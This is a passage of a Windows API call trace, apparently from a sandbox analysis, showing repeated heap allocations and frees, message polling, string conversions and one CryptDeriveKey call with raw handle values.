dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0188.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0188.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0188.896] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0188.899] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0188.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0188.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0188.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0188.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0188.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0188.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0188.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0188.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0188.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0188.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0188.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0188.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0188.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0188.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0188.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.900] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0188.900] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.900] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0188.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0188.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0188.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0188.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0188.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.901] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0188.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0188.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0188.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50aa0 [0188.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0188.901] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0188.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0188.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0188.901] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0188.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0188.901] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0188.902] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b78 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0188.902] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0188.902] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0188.903] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0188.903] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0188.904] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0188.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50c38 [0188.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50c38, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0188.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0188.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0188.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0188.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0188.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0188.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0188.909] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87550, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87590) returned 1 [0188.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0188.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0188.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0188.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0188.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0188.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0188.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0188.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0188.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0188.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0188.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0188.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0188.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0188.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0188.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0188.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0188.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0188.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0188.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0188.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0188.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0188.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0188.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0188.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0188.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0188.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0188.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0188.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0188.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0188.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0188.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0188.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0188.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0188.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0188.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0188.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 